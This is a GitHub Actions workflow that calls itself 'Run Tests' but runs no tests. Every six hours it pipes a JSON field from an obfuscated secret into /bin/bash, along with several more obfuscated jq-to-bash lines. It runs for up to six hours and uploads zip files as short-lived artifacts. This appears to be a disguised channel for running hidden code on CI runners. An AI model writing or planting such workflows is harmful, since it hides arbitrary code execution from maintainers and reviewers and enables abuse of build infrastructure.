name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '36 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          wz930: ${{ secrets.wz930 }}
        run: |
          printf '%s' "$wz930" | jq -r .jyil5 | /bin/bash
          echo $d4 | jq -r .vz59 | /bin/bash
          printf '%s' "$yyr3675" | jq -r .tkbnp03723 | /bin/bash
          printf '%s' "$ogf5884" | jq -r .z8440 | /bin/bash
          echo $hjoxs2320 | jq -r .vblp984 | /bin/bash
          echo $fi81547 | jq -r .ml354 | /bin/bash
          echo $eld430 | jq -r .xgky381 | /bin/bash
          echo $o8 | jq -r .iessu6728 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: yf8RKpOU
          path: "*.zip"
          retention-days: 1
